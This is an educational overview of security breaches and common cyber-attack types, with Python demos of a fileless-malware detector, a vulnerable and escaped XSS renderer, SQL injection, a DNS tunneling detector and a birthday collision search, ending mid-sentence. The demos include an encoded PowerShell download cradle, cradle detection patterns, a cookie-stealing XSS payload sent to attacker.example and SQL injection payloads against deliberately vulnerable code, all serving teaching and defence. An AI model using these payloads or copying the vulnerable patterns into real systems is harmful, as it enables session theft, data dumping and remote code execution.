
BREACHES IN CYBER SECURITY

A security breach is any incident that results in unauthorized access to
computer data, applications, networks or devices: information is accessed
without authorization. A security breach is effectively a break-in, whereas a
data breach is the attacker actually getting away with information.

What does "breach" mean?

In ordinary usage: 1. an infraction or violation of a law, obligation, tie or
standard ("a breach of trust", "sued them for breach of contract"); 2. a
broken, ruptured or torn condition or area ("a breach of the skin", "the leak
was a major security breach"). The security sense is the second one: something
got through a barrier that was meant to hold.

What is a security compromise?

The unauthorized disclosure, modification, substitution or use of sensitive
data (for example keys, metadata or other security-related information), or
the unauthorized modification of a security-related system, device or process
in order to gain unauthorized access. Unlike a vulnerability, which is only a
weakness, a compromise means the attacker has already succeeded.

What are examples of breaches?

"Breach" simply means to break or violate: breaking a hole in a sea wall and
breaking a contract are both breaches in the ordinary sense, as is any
violation or infraction of a law, legal obligation or promise. In security
the term covers any violation of a policy, control or legal obligation that
protects a system or its data; the sections below describe the technical forms
this takes.

How do security breaches happen?

An attacker either reaches a computer or network directly and takes local
files, or bypasses network security remotely. While most data breaches are
attributed to hacking or malware, other breach methods include insider leaks,
payment-card fraud, loss or theft of a physical drive or paper files, and plain
human error (misconfiguration, mis-addressed e-mail, publicly exposed storage).

What are the three types of security?

Security controls are conventionally grouped into three classes: management
(administrative) controls, operational controls and physical controls. The
NIST framing (SP 800-12, SP 800-53) names the third class technical controls
and treats physical security as part of the operational class; either way, a
sound program needs all three.

What are the types of security breaches?

- Man-in-the-middle (MITM) attack
- Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks
- Phishing and spear phishing
- Password attack
- Eavesdropping attack
- Cross-site scripting (XSS) attack
- Malware attack

Most of these are described in more detail under "Common Types of Cyber
Attacks" below.

Most often, cyber attacks happen because criminals want your:

- business's financial details;
- customers' financial details (e.g. credit card data);
- sensitive personal data;
- customers' or staff e-mail addresses and login credentials;
- customer databases;
- client lists;
- IT infrastructure itself (as a launch point for further attacks).
What are the main causes of security breaches?

A short list of major causes of data breaches:

- Cause #1: old, unpatched security vulnerabilities
- Cause #2: human error
- Cause #3: malware
- Cause #4: insider misuse
- Cause #5: physical theft of a data-carrying device

What Is a Cyber Attack?

A cyber attack is an attempt by cybercriminals, hackers or other digital
adversaries to access a computer network or system, usually in order to alter,
steal, destroy or expose information.

Cyber attacks can target a wide range of victims, from individual users to
enterprises or even governments. When targeting businesses or other
organizations, the attacker's goal is usually to reach sensitive and valuable
company resources, such as intellectual property (IP), customer data or
payment details.

Common Types of Cyber Attacks

What are the most common cyber security risks? The attack types covered in
this section are:

1. Ransomware
2. Malware
3. Malware as a Service (MaaS)
4. DoS and DDoS attacks
5. Phishing
6. MITM attack
7. Cross-site scripting (XSS)
8. SQL injection
9. DNS tunneling
10. Password attack
11. Birthday attacks
12. Drive-by attack
13. Cryptojacking
14. IoT-based attacks

1. Ransomware

Ransomware is a type of malware that denies legitimate users access to their
system or data and demands a payment, or ransom, to restore it. A ransomware
attack typically exploits a system vulnerability or stolen credentials to get
onto the network. Once a system is infected, the ransomware either locks the
machine or encrypts its files; many current crews also copy data out first and
threaten to publish it if the ransom is not paid.

Adversaries usually demand payment in cryptocurrency, which is pseudonymous
and hard, though not impossible, to trace. Unfortunately, in many cases the
victim is unable to recover fully even after paying: decryptors are slow or
buggy, and some data is never returned.

The rise in ransomware attacks

Ransomware is one of the most common types of malware attack today. According
to the CrowdStrike Global Security Attitude Survey, published in November
2020, more than half of the 2,200 respondents had suffered a ransomware attack
in the previous 12 months.

CrowdStrike's 2021 Global Threat Report also explored the growing use of
ransomware within certain industries. Its analysis found that the most common
targets included organizations conducting vaccine research and government
agencies managing responses to COVID-19. The report also notes that ransomware
attacks on manufacturing facilities have proven uniquely effective, as the
time-sensitive nature of production schedules often makes paying the ransom
cheaper than losing critical throughput.

Unfortunately for targets, ransomware attacks also tend to be among the more
high-profile security events, bringing negative publicity and reputational
harm. For example, in May 2021 Colonial Pipeline, which supplies gasoline and
jet fuel to the southeastern U.S., was hit by the DarkSide ransomware group.
The company shut its pipeline down as a precaution, which disrupted fuel
supply throughout the region. Colonial paid a ransom of about $4.4 million
(not billion) in Bitcoin, but the decryptor it received was so slow that it
restored largely from its own backups; the U.S. Department of Justice later
traced and seized roughly $2.3 million of the payment, a reminder that
cryptocurrency is not untraceable.
2. Malware

Malware, or malicious software, is any program or code created with the intent
to do harm to a computer, network or server. Malware is the most common type
of cyberattack, largely because the term covers so many subsets: ransomware,
trojans, spyware, viruses, worms, keyloggers, bots, cryptojacking and any
other attack that uses software in a malicious way.

The rise of fileless malware

Because organizations are taking steps to defend against traditional malware,
some cybercriminals are adapting their techniques to get around those
defences. One such technique is "fileless" malware, in which the malicious
code is carried in a native scripting language or written straight into memory
by a legitimate, already-installed program such as PowerShell, so that no new
executable ever touches disk. In a fileless attack it is also common for the
attacker to exploit a public-facing web server and then use a web shell to
move laterally through the environment.

Traditional antivirus products, and even application whitelisting, are largely
blind to attacks that run entirely inside trusted programs. Detection has to
shift to behaviour: which process launched which, with what command line, and
what it did next. This underscores the need for tools that protect against
both known and unknown threats.

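The behavioural angle above can be shown concretely. The following is an added example, not code from the original page or from CrowdStrike: a small triage routine over constructed process-creation events (parent image plus child command line, the fields an EDR or Sysmon event 1 would carry). It decodes PowerShell's -EncodedCommand argument (base64 of UTF-16LE text), looks for download cradles, hidden windows, and the two parent/child pairings that matter most for fileless tradecraft: an Office application spawning a shell, and a web-server worker process spawning a shell (the footprint of a web shell). The sample events, the staging URL 192.0.2.10 and the reason strings are all constructed for the example.

```python
import base64
import re

# Constructed sample: an attacker-style encoded PowerShell one-liner, built here so the
# event below is realistic. powershell.exe -EncodedCommand takes base64 of UTF-16LE text.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode("ascii")

# Constructed process-creation events (parent image, child command line); not real telemetry.
EVENTS = [
    ("explorer.exe", 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Temp"'),
    ("WINWORD.EXE", f"powershell.exe -nop -w hidden -enc {ENCODED}"),
    ("w3wp.exe", "cmd.exe /c whoami /all"),
    ("svchost.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"),
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "tomcat.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
CRADLE_PATTERNS = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression|Net\.WebClient)",
    re.IGNORECASE,
)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...)
# plus the documented -ec alias.
ENC_FLAGS = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)} | {"ec"}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the flag is absent/invalid."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("-") and tok[1:].lower() in ENC_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def score_event(parent, cmdline):
    """Return the list of reasons this process-creation event looks like fileless tradecraft."""
    reasons = []
    image = cmdline.split()[0].rsplit("\\", 1)[-1].lower()
    parent = parent.rsplit("\\", 1)[-1].lower()
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
    # Search both the raw command line and the decoded payload for cradle keywords.
    text = cmdline + (" " + decoded if decoded else "")
    if CRADLE_PATTERNS.search(text):
        reasons.append("download cradle")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.IGNORECASE):
        reasons.append("hidden window")
    if image in SHELLS and parent in OFFICE_PARENTS:
        reasons.append("Office application spawned a shell")
    if image in SHELLS and parent in WEB_WORKERS:
        reasons.append("web server worker spawned a shell (possible web shell)")
    return reasons


def triage(events):
    """Map each suspicious command line to its reasons; benign events are omitted."""
    alerts = {}
    for parent, cmd in events:
        reasons = score_event(parent, cmd)
        if reasons:
            alerts[cmd] = reasons
    return alerts


if __name__ == "__main__":
    for cmd, why in triage(EVENTS).items():
        print(f"ALERT {why}: {cmd[:80]}")
```

Run as-is, the admin's directory listing and the scheduled inventory script pass, while the Word-spawned encoded download cradle and the IIS worker running cmd.exe are flagged with their reasons. Real telemetry needs more: quoting and path normalisation of Windows command lines, the -Command/-c variants that pass script text in the clear, and allow-lists for the legitimate automation that also uses -EncodedCommand.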

3. Malware as a Service (MaaS)

Another growing trend is the use of malware as a service (MaaS) to carry out
attacks. In the MaaS model, malware authors lease their tooling and
infrastructure to affiliates rather than running attacks themselves; the
ransomware-specific form is ransomware as a service (RaaS), in which the
operators take a percentage of each ransom their affiliates collect. The model
allows anyone who wishes to carry out an attack to do so, even without the
technical skill or experience to build the malware.

4. DoS and DDoS Attacks

A denial-of-service (DoS) attack is a malicious, targeted attack that floods a
network or server with bogus requests in order to disrupt business operations.

During a DoS attack, users are unable to perform routine and necessary tasks,
such as accessing e-mail, websites, online accounts or other resources hosted
on the targeted computer or network. While most DoS attacks do not result in
lost data and are typically resolved without paying a ransom, they cost the
organization time, money and other resources to restore critical business
operations.

The difference between DoS and distributed denial-of-service (DDoS) attacks is
the origin of the traffic. A DoS attack comes from a single system, whereas a
DDoS attack is launched from many systems at once, usually a botnet. DDoS
attacks are larger and harder to block than DoS attacks because the many
sources must be identified and filtered; blocking one address achieves
nothing.

In December 2018 the FBI and its partners seized the domains of fifteen of the
largest DDoS-for-hire ("booter") services, which led to a dip in DDoS attacks.
However, numbers are once again on the rise. [According to recent research,
DDoS attacks increased by 151% in the first half of 2020.]

Part of the reason for this trend is the explosion of connected devices and
Internet of Things (IoT) technology. Unlike traditional endpoints such as
computers and smartphones, most IoT devices ship with weak security controls
(default credentials, no update mechanism), which makes them easy to
compromise and conscript into a botnet.

COVID-19 further exacerbated DDoS attacks in that the rapid shift to remote
work led to a proliferation of often poorly secured connected devices. This
dramatically expanded the attack surface at a time when many IT organizations
were preoccupied with basic tasks like ensuring remote access and support
services.

Example: The AWS DDoS Attack in 2020

Virtually any organization can fall victim to a DDoS attack, as the February
2020 attack on Amazon Web Services (AWS) showed. One of the largest DDoS
attacks ever reported, peaking at 2.3 Tbps, it targeted an unnamed AWS
customer using Connectionless Lightweight Directory Access Protocol (CLDAP)
reflection: the attacker sends small UDP queries with the victim's address
forged as the source to third-party CLDAP servers exposed on the Internet, and
each server sends its much larger reply to the victim, amplifying the traffic
many times over. The attack lasted three days. AWS's own threat report says
its Shield service mitigated it, but the episode drew wide attention to AWS
and its customers because of its sheer size.

5. Phishing

Phishing is a type of attack that uses e-mail, SMS, phone calls, social media
and other social-engineering techniques to entice a victim into sharing
sensitive information, such as passwords or account numbers, or into opening a
malicious file that installs malware on their computer or phone.

Common phishing examples in the COVID era

As noted above, COVID-19 dramatically increased attacks of all kinds,
including phishing. During the lockdown period people spent more time online
and also experienced heightened emotions, the ideal recipe for an effective
phishing campaign.

Throughout 2020 the CrowdStrike data science team closely tracked COVID-19-
related malspam (malicious spam). Most of it urged the recipient to download
an attachment, which was malware acting as a keylogger or password stealer.
Some of the most common scenarios and techniques included:

- Impersonating a doctor claiming to be able to treat or cure COVID-19.
- Impersonating a government organization sharing important public-health
information.
- Impersonating a courier service attempting to deliver a package.


The Most Impersonated Organizations in Phishing Scams

While the best-known phishing attacks involve outlandish claims, such as a
member of a royal family requesting an individual's banking information, the
modern phishing attack is far more sophisticated. In many cases a criminal
masquerades as a common retailer, service provider or government agency to
extract personal information that may seem benign, such as e-mail addresses,
phone numbers, the user's date of birth or the names of family members.

To assess which organizations are impersonated most often in phishing scams,
the CrowdStrike data science team submitted a FOIA request to the Federal
Trade Commission for the total number of reported phishing scams impersonating
each of the top 50 brands and all U.S. federal agencies.

The results show the U.S. public which brands' and organizations' e-mails
they need to be most cautious of, and which are the most lucrative to
impersonate. Topping the list is e-retailer Amazon, followed by technology
companies Apple (2), Microsoft (4) and Facebook (8). Others include the Social
Security Administration (3); retail banks such as Bank of America (5) and
Wells Fargo (6); telecommunications providers such as AT&T (7) and Comcast
(10); retailers such as Costco (11), Walmart (12) and Home Depot (18); and
courier services such as FedEx (9) and UPS (14).


6. MITM Attack

A man-in-the-middle (MITM) attack is one in which a malicious actor interposes
itself in, and eavesdrops on, the traffic between a network user and a web
application. The goal is to surreptitiously collect information, such as
personal data, passwords or banking details, and/or to impersonate one party
in order to solicit further information or prompt an action, for example
changing login credentials, completing a transaction or initiating a transfer
of funds.

While MITM attackers often target individuals, the technique is a significant
concern for businesses and large organizations as well. One common point of
access is through software-as-a-service (SaaS) applications: the attacker
uses an intercepted SaaS session as an entryway to the organization's wider
network and can then compromise any number of assets, including customer
data, IP or proprietary information about the organization and its employees.

The sudden influx of remote workers who relied on SaaS applications for
routine tasks during the COVID-19 lockdowns, together with the increase in
connected devices, has significantly increased the opportunity for MITM
attacks over the past two years.

The next frontier: Machine-in-the-Middle

[Although generally less well-known than ransomware or malware attacks, MITM
attacks are among the most widely used methods available to cybercriminals.
According to some estimates, 35 percent of incidents in which weaknesses were
exploited involved MITM attacks.]

As with malware attacks, advances in defences (TLS everywhere, HSTS,
certificate transparency) have made MITM and other network-based attacks
increasingly difficult to execute. As a result, cybercriminals have begun to
target the endpoint rather than the network. For example, the attacker may
compromise a user's computer and install their own root Certificate Authority
(CA) in its trust store, then generate certificates that the machine now
accepts as valid for any website. Because the root CA is controlled by the
attacker, TLS traffic from the user can be decrypted and inspected. In this
way "Man-in-the-Middle" becomes "Machine-in-the-Middle". Two practical
consequences: installing a root CA needs administrator rights or the user's
consent, so an unexpected root in the trust store is a strong detection
signal; and applications that pin their server's certificate or key reject the
rogue CA's certificates even though the operating system trusts them.

One recent MITM tool identified by CrowdStrike was a TrickBot module called
shaDll. The module installed illegitimate TLS certificates on infected
computers, which allowed it to intercept the user's encrypted web traffic; it
could then redirect web activity, inject code into pages, take screenshots and
gather data.

Example: The Fall of WebNavigatorBrowser

Another case highlighted by CrowdStrike is the Chromium-based adware browser
WebNavigatorBrowser. It counts as adware because it injects advertisements
into search results. The developer based it on Google's free, open-source
Chromium project, and the binaries were copyrighted and code-signed by Better
Cloud Solutions LTD, a legally registered company in the U.K.

In early 2020 Sectigo (formerly Comodo CA), a well-known Certificate
Authority, revoked WebNavigatorBrowser's code-signing certificate, making this
attack vector a thing of the past.


7. Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is a code-injection attack in which an adversary
gets malicious script into a page served by a legitimate website, usually
through user-supplied input that the site echoes back without escaping. The
script then runs in the victim's browser with the site's own privileges,
enabling the attacker to steal session data and other sensitive information,
or to act as the user. Stored XSS persists in the site's database (forum
posts, comments); reflected XSS rides in a crafted link; DOM-based XSS never
reaches the server at all. Web forums, message boards, blogs and other sites
that allow users to post their own content are the most exposed.

Though an XSS attack targets individual visitors of a web application, the
vulnerability lies in the application or web site itself. Organizations that
had to deploy a remote workforce may therefore have inadvertently exposed
themselves to this type of attack by making internal applications available
over the web or by deploying cloud-based services, increasing the attack
surface at a time of significant strain for businesses and IT teams in
particular.
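The stored-XSS case is easiest to see with the two renderers side by side. This is an added example, not code from the original page: a deliberately vulnerable comment renderer that concatenates user text into HTML, the escaped version, and a small harness built on Python's html.parser that reports which tags and on* event handlers a browser's parser would actually see in each output. The payload and the host attacker.example are constructed for the example; the CSP header value is an illustrative policy, not one taken from any real site.

```python
import html
from html.parser import HTMLParser

# Constructed attacker input: a stored-XSS payload as it might be posted as a forum comment.
# 'attacker.example' is a placeholder host, not a real site.
PAYLOAD = "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"


def render_comment_vulnerable(comment):
    """The bug: user text is concatenated straight into the page's HTML."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment):
    """The fix for this context: escape &, <, >, \" and ' so the browser shows the text verbatim."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


class _TagCollector(HTMLParser):
    """Records the tags and on* event handlers a browser's parser would see in the output."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def browser_view(rendered):
    """Return (tags, event_handlers) that a browser would act on in this HTML."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return parser.tags, parser.handlers


# Defence in depth: an example Content-Security-Policy that blocks inline handlers and
# off-site fetches even if an escaping bug slips through somewhere else on the site.
CSP_HEADER = "default-src 'self'; script-src 'self'; connect-src 'self'; object-src 'none'"


if __name__ == "__main__":
    print("vulnerable:", browser_view(render_comment_vulnerable(PAYLOAD)))
    print("escaped:   ", browser_view(render_comment_safe(PAYLOAD)))
```

The vulnerable renderer yields an img element with an onerror handler that exfiltrates document.cookie; the escaped one yields only the div, with the payload as inert text. Escaping is context-specific: html.escape is right for HTML body and attribute contexts, not for text placed inside a script block or a URL, which is why a template engine with automatic, context-aware escaping is preferable to hand-rolled calls. Marking session cookies HttpOnly keeps them out of document.cookie even when an XSS does fire.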

8. SQL Injection

A SQL injection attack is similar to XSS in that both are injection flaws:
the application builds a command by concatenating untrusted input into it.
Here the adversary injects SQL fragments into a data-driven application's
queries, which lets them read data the query was never meant to return.
Attackers use SQL injection to alter, steal or erase data, and sometimes to
run commands on the database host.

The main difference between XSS and SQL injection is who is targeted. XSS is
a client-side vulnerability that targets other users of the application,
whereas SQL injection is a server-side vulnerability that targets the
application's database.

One of the most common targets of SQL injection attacks is the gaming
industry. According to Akamai's State of the Internet report, attacks on the
gaming industry increased three-fold between 2019 and 2020, reaching more than
240 million web application attacks. SQL injection was the most common attack
vector, used to obtain player login credentials and other personal
information.

Once again, this uptick is attributable to increased time spent online during
COVID-19 lockdowns and social distancing.
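Two lookups against an in-memory database make the server-side nature of the flaw concrete. This is an added example, not code from the original page or from any of the reports it cites: a deliberately vulnerable query built by string concatenation next to the parameterised form, exercised with a tautology payload (returns every row) and a UNION payload (pulls the password hashes out through a column that was supposed to show e-mail addresses). The table, rows and payloads are constructed; SQLite is used only because it ships with Python, and the same two payloads work against any SQL dialect.

```python
import sqlite3


def build_demo_db():
    """In-memory SQLite with a constructed users table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [
            ("alice", "alice@example.com", "hash-of-alice-pw"),
            ("bob", "bob@example.com", "hash-of-bob-pw"),
        ],
    )
    return conn


def lookup_vulnerable(conn, username):
    """Deliberately vulnerable: the untrusted value becomes part of the SQL text."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Parameterised query: the value is bound by the driver and never parsed as SQL."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Constructed attacker inputs.
TAUTOLOGY = "nobody' OR '1'='1"                                            # every row matches
UNION_DUMP = "nobody' UNION SELECT username, password_hash FROM users --"  # hashes via the email column


if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable / tautology:", lookup_vulnerable(db, TAUTOLOGY))
    print("vulnerable / union:    ", lookup_vulnerable(db, UNION_DUMP))
    print("safe / tautology:      ", lookup_safe(db, TAUTOLOGY))
    print("safe / union:          ", lookup_safe(db, UNION_DUMP))
```

In the vulnerable function the tautology turns the WHERE clause into `username = 'nobody' OR '1'='1'`, and the UNION payload appends a second SELECT whose two columns line up with the original's, with `--` commenting out the dangling quote. The parameterised function returns nothing for either input because the whole string is compared as a literal username. Parameterisation (or an ORM that does it for you) is the fix; input filtering alone is not, because the set of dangerous characters depends on the database and the query context.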

9. DNS Tunneling

DNS tunneling is an attack that abuses Domain Name System (DNS) queries and
responses to carry data and code past traditional security controls, since
most networks let DNS out unconditionally.

Once a host is infected, the attacker's malware encodes its traffic into DNS:
outbound data goes in the subdomain labels of queries to a domain the attacker
controls, and commands come back in the responses (often TXT or NULL records).
The tunnel gives the attacker a channel for command and control, for
delivering further malware, and for extracting data, IP or other sensitive
information a few dozen bytes per query.

DNS tunneling attacks have increased in recent years, in part because they are
relatively simple to set up: ready-made tunneling toolkits and guides are
available online, even on mainstream sites such as YouTube.
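The encoding described above leaves a signature a resolver log can reveal: many distinct, long, high-entropy subdomains under one registered domain, often with TXT or NULL query types. The following is an added example, not code from the original page: a detector that profiles a constructed resolver log per registered domain and flags those whose subdomain labels look like encoded data. The log lines, client addresses and the domain evil-tunnel.net are constructed; the thresholds are starting points, not calibrated values, and the registered-domain split is the naive last-two-labels rule (noted in the code as an assumption).

```python
import math
from collections import defaultdict

# Constructed resolver log (time client qtype qname); not real traffic. The
# 'evil-tunnel.net' names carry base32-style data in their labels.
SAMPLE_LOG = """\
10:00:01 10.0.0.5 A www.example.com
10:00:02 10.0.0.5 A cdn.example.com
10:00:02 10.0.0.5 AAAA mail.example.com
10:00:03 10.0.0.7 TXT mfrggzdfmztwq2lknnwg23tpobyxe43uov3ho6dzpi.t.evil-tunnel.net
10:00:03 10.0.0.7 TXT nbswy3dpfqqhi33pf5zgk3tuebtgk3dmorsxg5bamfyha.t.evil-tunnel.net
10:00:04 10.0.0.7 TXT krugs4zanfzsa43fmnzgk5banfxgm3zafvsxsidu.t.evil-tunnel.net
10:00:04 10.0.0.7 TXT pnssgczddnjdqvjuk5gtgv2vkqzxayexaqzdsmbt.t.evil-tunnel.net
10:00:05 10.0.0.7 TXT hjdcn34d5ss6ex3vyvr7d3xddibqz6gbi5ym6a2.t.evil-tunnel.net
10:00:06 10.0.0.5 A api.example.com
"""


def shannon_entropy(s):
    """Bits of entropy per character; random-looking encodings score high."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Naive registered-domain split (assumption: last two labels). A production detector
    should use the Public Suffix List so that e.g. foo.co.uk is handled correctly."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), "".join(labels[:-2])


def profile(log_text):
    """Per registered domain: unique subdomains, subdomain lengths/entropies, TXT/NULL count."""
    stats = defaultdict(lambda: {"subs": set(), "lens": [], "ents": [], "txt": 0, "n": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, _client, qtype, qname = line.split()
        domain, sub = split_name(qname)
        st = stats[domain]
        st["n"] += 1
        st["subs"].add(sub)
        st["lens"].append(len(sub))
        st["ents"].append(shannon_entropy(sub))
        st["txt"] += qtype.upper() in ("TXT", "NULL")
    return stats


def detect_tunnels(log_text, min_unique=3, min_entropy=3.0, min_len=30):
    """Flag domains whose subdomain labels look like encoded data: many unique, long,
    high-entropy subdomains, or a majority of TXT/NULL queries."""
    flagged = []
    for domain, st in profile(log_text).items():
        mean_len = sum(st["lens"]) / st["n"]
        mean_ent = sum(st["ents"]) / st["n"]
        txt_share = st["txt"] / st["n"]
        if len(st["subs"]) >= min_unique and (
            (mean_ent >= min_entropy and mean_len >= min_len) or txt_share > 0.5
        ):
            flagged.append(domain)
    return sorted(flagged)


if __name__ == "__main__":
    for domain, st in profile(SAMPLE_LOG).items():
        print(domain, len(st["subs"]), round(sum(st["ents"]) / st["n"], 2), st["txt"], st["n"])
    print("flagged:", detect_tunnels(SAMPLE_LOG))
```

example.com has four short, low-entropy subdomains and no TXT queries; evil-tunnel.net has five unique 40-character labels with entropy well above 3 bits per character, all queried as TXT, and is the only domain flagged. Legitimate services also produce high-entropy names (CDN cache keys, anti-virus cloud lookups, some certificate-validation schemes), so a real deployment pairs this profile with an allow-list and with volume: a tunnel sends hundreds of such queries a minute from one client.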

10. Password Attack

Password attacks, any attack in which an adversary tries to obtain a user's
password, are one of the leading causes of both corporate and personal data
breaches.

Password attacks are on the rise because they are an effective means of
gaining access to a network or account. Many users choose weak passwords,
reuse the same password across multiple sites, or keep using a password that
has already appeared in a breach, and attackers exploit exactly those habits
through credential stuffing, password spraying and brute force. Multi-factor
authentication blunts all three.

[According to the Verizon 2021 Data Breach Investigations Report, compromised
credentials, such as weak or stolen passwords, are the primary point of access
for attackers: more than six in ten breaches (61%) involved user
credentials.]

11. Birthday Attacks

A birthday attack is a brute-force collision search against a hash function:
the attacker generates many inputs until two of them hash to the same value,
which takes only about 2^(n/2) attempts for an n-bit hash rather than 2^n. It
is used to forge signatures or certificates (two documents with the same hash
carry the same signature), not to recover a password. The name comes from the
birthday paradox: among 23 people there is already a 50% chance that two share
a birthday, and among 30 people about 70%.
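Both halves of that paragraph, the probability and the square-root work factor, can be checked directly. This is an added example, not code from the original page: the exact birthday probability for n people, the expected number of hashes before a collision on a b-bit digest, and a generic collision search that finds two distinct messages whose SHA-256 digests agree in their first 32 bits in roughly 2^16 attempts rather than 2^32. The message format "message-<i>" is an arbitrary choice for the example; the truncation is what makes the search feasible on a laptop, and the same loop against the full 256-bit digest would never finish.

```python
import hashlib
import itertools
import math


def birthday_probability(n, d=365):
    """Probability that at least two of n draws from d equally likely values coincide."""
    p_all_distinct = 1.0
    for k in range(n):
        p_all_distinct *= (d - k) / d
    return 1.0 - p_all_distinct


def expected_trials(bits):
    """Expected number of random hashes before a collision on a `bits`-bit digest:
    about sqrt(pi/2 * 2^bits), i.e. on the order of 2^(bits/2)."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


def truncated_digest(message, bits):
    """First `bits` bits of SHA-256 as bytes (bits must be a multiple of 8 here)."""
    return hashlib.sha256(message).digest()[: bits // 8]


def find_collision(bits=32):
    """Generic birthday search: hash distinct messages until two share a truncated digest.
    Returns (message_a, message_b, trials). Memory grows with the number of trials, which
    is the classic time/memory trade-off of this attack."""
    seen = {}
    for i in itertools.count():
        msg = f"message-{i}".encode()   # arbitrary distinct inputs for the example
        tag = truncated_digest(msg, bits)
        if tag in seen:
            return seen[tag], msg, i + 1
        seen[tag] = msg


if __name__ == "__main__":
    print(f"23 people: {birthday_probability(23):.3f}, 30 people: {birthday_probability(30):.3f}")
    a, b, trials = find_collision(32)
    print(f"32-bit collision after {trials} trials (expected about {expected_trials(32):.0f}):")
    print(a, b, truncated_digest(a, 32).hex())
```

The trial count varies from run to run but clusters around 82,000 for 32 bits. The practical lesson is the one the paragraph states: a hash's collision resistance is half its output length, which is why 64- and 128-bit digests (and MD5, SHA-1 with their known shortcuts) are unacceptable wherever an attacker controls both documents, such as certificate requests or signed contracts.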

12. Drive-By Attack

A drive-by attack, or drive-by download, is a malware attack that exploits
vulnerabilities in the web browser, its plugins or other applications when the
victim merely visits a compromised or malicious page; no click or download
prompt is needed. Once the exploit runs, the attacker can hijack the device,
spy on the user's activity or steal data and personal information. Drive-by
attacks are more complex to deploy than e-mailed malware, but they are
becoming more common as security measures improve and increasingly deflect
traditional malware attacks.

13. Cryptojacking

Cryptojacking is the unauthorized use of a person's or organization's
computing resources to mine cryptocurrency.

Cryptojacking programs may be malware installed on a victim's computer via
phishing, infected websites or the other usual malware vectors; they may also
be small pieces of JavaScript inserted into digital ads or web pages that mine
only while the victim has a particular site open.

Cryptoj acking waned after 2018 because of increased attention from law
enforcement and the shutdown, in March 2019, of Coinhive, the leading
browser-based Monero mining service. Such attacks have since increased again
with the rising value of cryptocurrencies; on servers and in the cloud the
telltale signs are sustained CPU usage and outbound connections to mining
pools.

14. IoT-Based Attacks

An IoT attack is any attack that targets an Internet of Things (IoT) device
or network. Once a device is compromised, the attacker can take control of it,
steal data, or enrol it in a botnet of infected devices used to launch DoS or
DDoS attacks.

[According to the Nokia Threat Intelligence Lab, connected devices are
responsible for nearly one-third of mobile network infections, more than
double the share in 2019.]

Given that the number of connected devices is expected to grow rapidly over
the next several years, security experts expect IoT infections to grow as
well. The roll-out of 5G networks, which will further fuel the use of
connected devices, may also lead to an uptick in attacks.

EXPLOITS in cyber security

An exploit is code (or a sequence of inputs) that takes advantage of a
software vulnerability or security flaw to make the target do something its
author did not intend, typically to run attacker-supplied code. An exploit is
usually only the first stage: once it has gained execution it drops a payload
such as a backdoor trojan or spyware that can steal user information from the
infected system.

What are types of exploits?

Exploits are commonly classified as known or unknown. Known exploits target
vulnerabilities that security researchers have already discovered and
disclosed; whether the flaw is in an application, the OS or even hardware, the
vendor can ship a patch and defenders can look for the exploit's signature.
Unknown, or zero-day, exploits target flaws the vendor is not yet aware of, so
no patch exists when they are first used.

What are examples of exploits?

The everyday meanings of "exploit" (a daring feat, or using someone for one's
own ends) are not the security sense. In security, typical exploits are: a
crafted network packet that overflows a buffer in a listening service and runs
the attacker's code; a web request that turns a SQL injection flaw into a
database dump; a document or image that abuses a parser bug to execute code
when opened; and a local program that abuses a privileged system service to
gain administrator rights.

How many types of exploits are there?

By where the attacker must be, there are two types: remote exploits, which
can be launched over the network against a system the attacker has no prior
access to, and local exploits, which require the attacker to already have some
access to the system (for example a low-privileged account or a foothold from
phishing) and are typically used to escalate privileges. "Local" does not mean
physical access.

INFORMATION GATHERING

What is information gathering in cyber security?

Information gathering is the act of collecting information about a potential
target. It is done for penetration testing, network security monitoring and
other security tasks.

It is the first stage of ethical hacking, and of real attacks: the penetration
tester or attacker, black hat or white hat, gathers everything available about
the target so it can be used in the attack. The more relevant information is
collected, the higher the probability of a successful attack, so it is a skill
every pen-tester should master. Tools and techniques range from public sources
such as WHOIS and nslookup to active scanning; passive techniques leave no
trace on the target, active ones (port scans, probes) do. The step matters
because later attacks depend on this material: a person's pet name, best
